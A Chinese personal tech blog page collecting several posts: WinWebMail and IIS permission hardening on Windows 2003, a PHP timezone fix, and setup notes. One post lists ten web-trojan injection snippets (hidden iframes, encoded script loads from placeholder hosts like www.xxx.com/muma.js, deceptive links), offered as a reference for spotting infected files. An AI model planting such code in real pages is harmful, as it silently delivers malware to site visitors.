悠然小屋

不自重者,取辱。不自长者,取祸。不自满者,受益。不自足者,博闻!

«   2019年3月   »
123
45678910
11121314151617
18192021222324
25262728293031
搜索
Tags列表
最新留言
    最近发表
    文章归档
    友情链接

      PHP+FPM导致内存耗光的问题 .

       

      最近总是发现fpm挂掉,查看日志是因为内存耗光了。  

      挂马代码集合

       

      挂马代码

      挂马代码大全

      ps:检查文件是否被挂马的时候可以参考下!

      一:框架挂马

      <iframe src=地址 width=0 height=0></iframe> 

      二:js文件挂马

      首先将以下代码
      document.write("<iframe width='0' height='0' src='地址'></iframe>");
      保存为xxx.js,
      则JS挂马代码为
      <script language=javascript src=xxx.js></script> 

      三:js变形加密

      <SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script> 
      muma.txt可改成任意后缀
      四:body挂马

      <body onload="window.location='地址';"></body>

      五:隐蔽挂马

      top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';

      六:css中挂马

      body { 
      background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')} 

      七:JAJA挂马

      <SCRIPT language=javascript> 
      window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); 
      </script>

      八:图片伪装

      <html>
      <iframe src="网马地址" height=0 width=0></iframe>
      <img src="图片地址"></center>
      </html>

      九:伪装调用:

      <frameset rows="444,0" cols="*">
      <frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
      <frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
      </frameset>

      十:高级欺骗

      <a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a>
      <SCRIPT Language="JavaScript">
      function www_163_com ()
      {
      var url="网马地址";
      open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
      }
      </SCRIPT>

       

      Winwebmail目录下及根目录的用户权限设置

      Winwebmail目录下及根目录的用户权限设置很重要,  经多次调试,我的情况如下:

      1、Winwebmail安装的根目录下必须给Users用户读取及写入的权限,如:

      安装在D:\winwebmail目录下,则D盘必须给UsersUsers用户读取及写入的权限;

      2、Winwebmail安装目录必须给Users角色的用户或Users读取及写入的权限,如我的是给IUSR_*********用户访问Webmail, 但IUSR_*******是Guests用户,所以我的服务器权限是继承了D:\盘的权限,再加入IUSR_*********全权控制的权限。

      以上是我的设置,并经过多次调试成功。 


      系统环境:
      WIN2003企业版+IIS6+MCAFEE8+XXXX防火墙软件
      WINWEBMAIL 3.6.3.1(安装路径 D:\WINWEBMAIL)
      权限设置: 
      D盘根目录
      超级用户,SYSTEM用户:完全控制
      IIS来宾帐号,UESER用户: 读取和运行,列出文件夹目录,读取

      D:\WINWEBMAIL
      超级用户,SYSTEM用户:完全控制
      IIS来宾帐号,UESER用户:完全控制

      除去了EVERYONE完全控制后的权限设置方面,相对于WIN2000 SERVER来说,主要增加了USER用户的访问权限
      (原因是什么?自己找找WIN2003方面的资料看看)
      以上设置均经过了测试(客户端可以使用WEB访问邮件系统,正常收发邮件)
      以上设置仅供参考~


      在 win2k3 下安装 WinWebMail 3.6.3.1 完全攻略手册!

      作者:老Q  时间:2004-12-4  文档类型:原创  来自:蓝色理想

      1)查看硬盘:两块9.1G SCSI 硬盘(实容量8.46*2)

      2)分区
      系统分区X盘7.49G
      WEB 分区X盘1.0G
      邮件分区X盘8.46G(带1000个100M的邮箱足够了)

      3)安装WINDOWS SERVER 2003

      4)打基本补丁(防毒)...在这之前一定不要接网线!

      5)在线打补丁

      6)卸载或禁用微软的SMTP服务(Simple Mail Transpor Protocol),否则会发生端口冲突

      7)安装WinWebMail,然后重启服务器使WinWebMail完成安装.并注册.然后恢复WinWebMail数据.

      8)安装Norton 8.0并按WinWebMail帮助内容设定,使Norton与WinWebMail联合起到邮件杀毒作用(将Norton更新到最新的病毒库)
      8.1 启用Norton的实时防护功能
      8.2 必须要设置对于宏病毒和非宏病毒的第1步操作都必须是删除被感染文件,并且必须关闭警告提示!!
      8.3 必须要在查毒设置中排除掉安装目录下的 \mail 及其所有子目录,只针对WinWebMail安装文件夹下的 \temp 文件夹进行实时查毒。注意:如果没有 \temp 文件夹时,先手工创建此 \temp 文件夹,然后再进行此项设置。

      9)将WinWebMail的DNS设置为win2k3中网络设置的DNS,切记,要想发的出去最好设置一个不同的备用DNS地址,对外发信的就全靠这些DNS地址了

      10)给予安装 WinWebMail 的盘符以及父目录以 Internet 来宾帐户 (IUSR_*) 允许 [读取\运行\列出文件夹目录] 的权限.
      WinWebMail的安装目录,INTERNET访问帐号完全控制
      给予[超级用户/SYSTEM]在安装盘和目录中[完全控制]权限,重启IIS以保证设定生效.

      11)防止外发垃圾邮件:
      11.1 在服务器上点击右下角图标,然后在弹出菜单的“系统设置”-->“收发规则”中选中“启用SMTP发信认证功能”项,有效的防范外发垃圾邮件。
      11.2 在“系统设置”-->“收发规则”中选中“只允许系统内用户对外发信”项。
      11.3 在服务器上点击右下角图标,然后在弹出菜单的“系统设置”-->“防护”页选中“启用外发垃圾邮件自动过滤功能”项,然后再启用其设置中的“允许自动调整”项。
      11.4 “系统设置”-->“收发规则”中设置“最大收件人数”-----> 10.
      11.5 “系统设置”-->“防护”页选中“启用连接攻击保护功能”项,然后再设置“启用自动保护功能”.
      11.6 用户级防付垃圾邮件,需登录WebMail,在“选项 | 防垃圾邮件”中进行设置。

      12)打开IIS 6.0, 确认启用支持 asp 功能, 然后在默认站点下建一个虚拟目录(如: mail), 然后指向安装 WinWebMail 目录下的 \Web 子目录, 打开浏览器就可以按下面的地址访问webmail了:
      http://<;;你的IP或域名>/mail/什么? 嫌麻烦不想建? 那可要错过WinWebMail强大的webmail功能了, 3分钟的设置保证物超所值  :)

      13)Web基本设置:
      13.1 确认“系统设置”-->“资源使用设置”内没有选中“公开申请的是含域名帐号”
      13.2 “系统设置”-->“收发规则”中设置Helo为您域名的MX记录

      13.3.解决SERVER 2003不能上传大附件的问题:
      13.3.1 在服务里关闭 iis admin service 服务。
      13.3.2 找到 windows\system32\inetsrv\ 下的 metabase.xml 文件。
      13.3.3 用纯文本方式打开,找到 ASPMaxRequestEntityAllowed 把它修改为需要的值(可修改为10M即:10240000),默认为:204800,即:200K。
      13.3.4 存盘,然后重启 iis admin service 服务。

      13.4.解决SERVER 2003无法下载超过4M的附件的问题
      13.4.1 先在服务里关闭 iis admin service 服务。
      13.4.2 找到 windows\system32\inetsrv\ 下的 metabase.xml 文件。
      13.4.3 用纯文本方式打开,找到 AspBufferingLimit 把它修改为需要的值(可修改为20M即:20480000)。
      13.4.4 存盘,然后重启 iis admin service 服务。

      13.5.解决大附件上传容易超时失败的问题.
      在IIS中调大一些脚本超时时间,操作方法是: 在IIS的“站点或(虚拟目录)”的“主目录”下点击“配置”按钮,设置脚本超时间为:300秒(注意:不是Session超时时间)。

      13.6.解决Windows 2003的IIS 6.0中,Web登录时经常出现"[超时,请重试]"的提示.
      将WebMail所使用的应用程序池“属性-->回收”中的“回收工作进程”以及"属性-->性能"中的“在空闲此段时间后关闭工作进程”这两个选项前的勾号去掉,然后重启一下IIS即可解决.

      13.7.解决通过WebMail写信时间较长后,按下发信按钮就会回到系统登录界面的问题.
      适当增加会话时间(Session)为 60分钟。在IIS站点或虚拟目录属性的“主目录”下点击[配置---选项],就可以进行设置了(SERVER 2003默认为20分钟).

      13.8.安装后查看WinWebMail的安装目录下有没有 \temp 目录,如没有,手工建立一个.

      14)做邮件收发及10M附件测试(内对外,内对内,外对内).

      15)打开2003自带防火墙,并打开POP3.SMTP.WEB.远程桌面.充许此4项服务, OK, 如果想用IMAP4或SSL的SMTP.POP3.IMAP4也需要打开相应的端口.

      16)再次做邮件收发测试(内对外,内对内,外对内).

      17)改名、加强壮口令,并禁用GUEST帐号。

      18)改名超级用户、建立假administrator、建立第二个超级用户。

      都搞定了!忙了半天, 现在终于可以来享受一把 WinWebMail 的超强 webmail 功能了, let's go!


      注意:

      如果服务器同时作为WEB服务器,而WEB服务器的IIS用户组的权限有没有进行详细而严格的设置的话,上面这样的权限可能会造成跨站攻击,更详细的设置方法可以参考:

      如WEB站点是D:\WEB Mail是D:\MAIL

      1,对于WinWebMail权限配置还是按照官方说明配置。
      2,对于Web站点权限配置是每一个站点独立分配一个帐户,然后这些帐户全部属于guest组,其权限控制按照我们平时做的去配置即可。
      3, 最关键的是D盘根目录以及Mail目录,方法就是把D盘根目录设置为guest用户组完全拒绝,这样Webshell就无法访问D盘根目录;同样, Mail目录也如法炮制,这样做可以防止通过Webshell下载Mail系统的配置文件进而破解出一些东西来攻击Mail系统;还有一个地方就是 Mail下的子目录Web目录,也就是存放Mail系统的ASP文件目录,对于这个目录也进行同样的权限控制,这样即使由于ASP程序出现漏洞,也不会对 MAIL系统造成危害,包括其子目录Temp也可以这样处理。
      4,对于第三步的权限控制不继承到子目录,只对当前目录有效。

       

      关键词如何放置

       

      1. 首先关键词应该在文章的每个段落里; 

      php时间戳存在8小时误差

       

      当将PHP时间戳转化为正常的时间格式一般的操作方法如下: 
      $mytime=time();
      echo $mytime.'<br />';
      echo date('Y-m-d H:i:s',$mytime);

      这样做的后果就是前后相差了8个小时,主要原因是php5.1以上时间戳会与实际时间相差8小时
      解决办法如下:
      1、最简单的方法就是不要用php5.1以上的版本--显然这是不可取的方法!!!

      2、修改php.ini。打开php.ini查找date.timezone 去掉前面的分号= 后面加Asia/Shanghai,重启apache服务器即可--缺点就是如果程序
      放到别人的服务器上,不能修改php.ini,那就奈何不得了。

      3、在程序中添加时间的初始化的语句的即:“date_default_timezone_set("Asia/Shanghai"); ”这个可以由程序员任意设置,我的推
      荐。
      时区标识符,大陆内地可用的值是:PRC,Asia/Chongqing ,Asia/Shanghai ,Asia/Urumqi (依次为中国,重庆,上海,乌鲁木齐) ,Etc/GMT-8,Asia/Harbin
      港台地区可用:Asia/Macao ,Asia/Hong_Kong ,Asia/Taipei (依次为澳门,香港,台北)
      还有新加坡:Asia/Singapore

      这样就可以实现输出的是北京时间了

       

      IBM X3850 X5服务器ESXi 5安装配置全过程——安装

       

      本系列以一台新上架的IBM X3850 X5服务器为例,从开始做RAID5到VMWARE ESXI5的安装配置进行全程演示,希望对你有些帮助。

      Centos6.3 + php5.3 + nginx1.2.2 + mysql5.5服务器搭建过程及问题记录

       

      一.配置环境

        OS:Centos6.3

      Linux 代理脚本,我见过最牛的脚本

      Linux 代理脚本,我见过最牛的脚本

      #iptables

      本脚本环境为eth0外网,eth1内网;
      #!/bin/sh
      #外网网卡
      EXT_IF="eth0"
      FW_IP="61.137.85.21"
      #内网网卡
      INT_IF="eth1"
      LAN_IP="192.168.0.1"
      ...

      Powered By Z-BlogPHP 1.5.2 Zero & Theme by Washun Copyright Csuper All Rights Reserved. 湘ICP备18017694 网络是工具,不是玩具 QQ:493754678 [登录]